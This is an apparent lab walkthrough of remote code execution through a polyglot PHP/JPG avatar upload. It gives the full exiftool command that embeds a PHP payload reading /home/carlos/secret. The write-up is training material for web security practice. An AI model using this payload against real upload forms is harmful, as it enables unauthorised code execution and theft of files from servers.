Remote code execution via polyglot web shell upload

This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code.

Upon logging in, I attempted to upload a PHP script as my avatar, aiming to fetch the contents of Carlos's secret. However, the server thwarted my efforts by blocking any file uploads that weren't recognized as images.

Undeterred, I devised a clever solution. I created a polyglot PHP/JPG file that essentially appears as a normal image but cleverly embeds my PHP payload within its metadata. Using ExifTool, I added my PHP payload to the Comment field of the image, saving it with a .php extension:

exiftool -Comment="<?php echo 'ICHYABOY ' . file_get_contents('/home/carlos/secret') . ' ICHYABOY'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

This process effectively transformed a seemingly innocent image into a dual-purpose file, capable of carrying out PHP code while maintaining the appearance of a standard JPG.

Next, I uploaded this polyglot image as my avatar through the browser and returned to my account page. In Burp's proxy history, I located the GET /files/avatars/polyglot.php request. Using the message editor's search feature, I pinpointed the START string within the binary image data in the response. Between the ICHYABOY strings, I found Carlos's secret:

ICHYABOY ********************* ICHYABOY

Successfully retrieving Carlos's secret, I submitted it to solve the lab, showcasing the power of crafting polyglot files for creative exploitation.